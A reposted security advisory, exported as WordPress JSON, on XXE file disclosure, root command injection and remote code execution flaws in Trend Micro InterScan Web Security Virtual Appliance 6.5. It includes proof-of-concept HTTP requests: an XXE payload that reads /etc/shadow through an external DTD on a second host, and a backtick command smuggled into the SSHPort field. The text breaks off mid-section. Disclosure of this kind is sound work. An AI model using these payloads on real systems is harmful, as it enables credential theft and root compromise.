{"id":7787,"date":"2017-05-30T14:19:17","date_gmt":"2017-05-30T22:19:17","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/05\/30\/news-1572\/"},"modified":"2017-05-30T14:19:17","modified_gmt":"2017-05-30T22:19:17","slug":"news-1572","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/05\/30\/news-1572\/","title":{"rendered":"SSD Advisory \u2013 Trend Micro Interscan Web Security Virtual Appliance Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 25 May 2017 11:52:44 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3050\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3050');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes three (3) vulnerabilities found in Trend Micro Interscan Web Security Virtual Appliance\u00a0version 6.5.<\/p>\n<p>&#8220;The Trend Micro Hybrid Cloud Security solution, powered by XGen security, delivers a blend of cross-generational threat defense techniques that have been optimized to protect physical, virtual, and cloud workloads.&#8221;<\/p>\n<p>The vulnerabilities found in Trend Micro Interscan Web Security Virtual Appliance:<\/p>\n<ol>\n<li>XML External Entity (XXE) that lead to arbitrary file disclosure<\/li>\n<li>Local Privilege Escalation<\/li>\n<li>Remote code execution<\/li>\n<\/ol>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Trend Micro has released patches to address these vulnerabilities and issued the following advisory: <a href=\"https:\/\/success.trendmicro.com\/solution\/1117412\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/success.trendmicro.com\/solution\/1117412<\/a><\/p>\n<p><span id=\"more-3050\"><\/span><\/p>\n<p><u><strong>Vulnerabilities Details<\/strong><\/u><br \/> <strong>XML External Entity (XXE) that lead to arbitrary file disclosure<\/strong><br \/> Trend Micro Security Manager uses an outdated REST API (resteasy-jaxrs-2.3.5.Final.jar). The library suffers from an XXE vulnerability that can be exploited using Parameter Entities.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> By sending the following POST request, an attacker can gain the victims &#8220;<em>\/etc\/shadow<\/em>&#8221;<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-592defe3ec9e2212125914\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/rest\/authentication\/login\/sso HTTP\/1.1  Host: 192.168.18.129:4119  Content-Type: application\/xml  Content-Length: 360    &lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;utf-8&#8243;?&gt;  &lt;!DOCTYPE roottag [   &lt;!ENTITY % start &#8220;&lt;![CDATA[&#8220;&gt;   &lt;!ENTITY % goodies SYSTEM &#8220;file:\/\/\/etc\/shadow&#8221;&gt;   &lt;!ENTITY % end &#8220;]]&gt;&#8221;&gt;   &lt;!ENTITY % dtd SYSTEM &#8220;http:\/\/192.168.18.130\/combine.dtd&#8221;&gt;  %dtd;  ]&gt;    &lt;dsCredentials&gt;  &lt;password&gt;P@ssw0rd&lt;\/password&gt;  &lt;tenantName&gt;&lt;\/tenantName&gt;  &lt;userName&gt;&amp;all;&lt;\/userName&gt;  &lt;\/dsCredentials&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0062 seconds] -->  <\/p>\n<p><strong>Local Privilege Escalation<\/strong><br \/> Admin users have access via the web interface to the SSH configuration settings. The port settings are not properly handled and allow injecting shell commands as the root user.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-592defe3ec9f2565206810\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/SSHConfig.jsp HTTP\/1.1  Host: 192.168.254.176:8443  User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Referer: https:\/\/192.168.254.176:8443\/SSHConfig.jsp  Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D  Connection: close  Content-Type: application\/x-www-form-urlencoded  Content-Length: 150  CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&amp;needSSHConfigure=yes&amp;SSHSt  atus=enable&amp;SSHPort=22&amp;op=save&amp;cbSSHStatus=enable&amp;btSSHPort=221<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f2565206810-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f2565206810-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f2565206810-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f2565206810-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f2565206810-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f2565206810-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f2565206810-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f2565206810-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f2565206810-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f2565206810-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f2565206810-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f2565206810-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f2565206810-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SSHConfig<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">jsp <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f2565206810-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.254.176<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f2565206810-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">X11<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Linux <\/span><span class=\"crayon-v\">x86_64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">45.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">45.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f2565206810-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f2565206810-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f2565206810-6\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.254.176:8443\/SSHConfig.jsp<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f2565206810-7\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">2930898FD09512142C1B26C71D24466D<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f2565206810-8\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f2565206810-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">urlencoded<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f2565206810-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">150<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f2565206810-11\"><span class=\"crayon-v\">CSRFGuardToken<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">needSSHConfigure<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">yes<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-e\">SSHSt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f2565206810-12\"><span class=\"crayon-v\">atus<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">SSHPort<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">22<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">op<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">save<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">cbSSHStatus<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">btSSHPort<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">221<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<p>In the above code, the <em>SSHPort=<\/em> parameter does not sanitize the incoming data. An attacker can use this to inject commands that will run as root on the victim&#8217;s machine.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> The following POST request will call the <em>sleep<\/em> command with a value of 60 seconds:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-592defe3ec9f9913970918\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  POST \/SSHConfig.jsp HTTP\/1.1  Host: 192.168.254.176:8443  User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Referer: https:\/\/192.168.254.176:8443\/SSHConfig.jsp  Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D  Connection: close  Content-Type: application\/x-www-form-urlencoded  Content-Length: 150    CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&amp;needSSHConfigure=yes&amp;SSHSt  atus=enable&amp;SSHPort=%60sleep%2010%60&amp;op=save&amp;cbSSHStatus=enable&amp;btSSHPort=221<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f9913970918-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f9913970918-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f9913970918-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f9913970918-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f9913970918-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f9913970918-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f9913970918-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f9913970918-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f9913970918-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f9913970918-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f9913970918-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9f9913970918-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9f9913970918-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f9913970918-1\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SSHConfig<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">jsp <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f9913970918-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.254.176<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f9913970918-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">X11<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Linux <\/span><span class=\"crayon-v\">x86_64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">45.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">45.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f9913970918-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f9913970918-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f9913970918-6\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.254.176:8443\/SSHConfig.jsp<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f9913970918-7\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">2930898FD09512142C1B26C71D24466D<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f9913970918-8\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f9913970918-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">urlencoded<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f9913970918-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">150<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f9913970918-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9f9913970918-12\"><span class=\"crayon-v\">CSRFGuardToken<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">needSSHConfigure<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">yes<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-e\">SSHSt<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9f9913970918-13\"><span class=\"crayon-v\">atus<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">SSHPort<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">60sleep<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2010<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">60<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">op<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">save<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">cbSSHStatus<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">btSSHPort<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">221<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0040 seconds] -->  <\/p>\n<p><strong>Remote code execution<\/strong><br \/> Trend Micro Interscan Web Security Virtual Appliance\u00a0has a default user with <em>sudo<\/em> privileges named <em>iscan<\/em>. This user is locked out but it can access certain 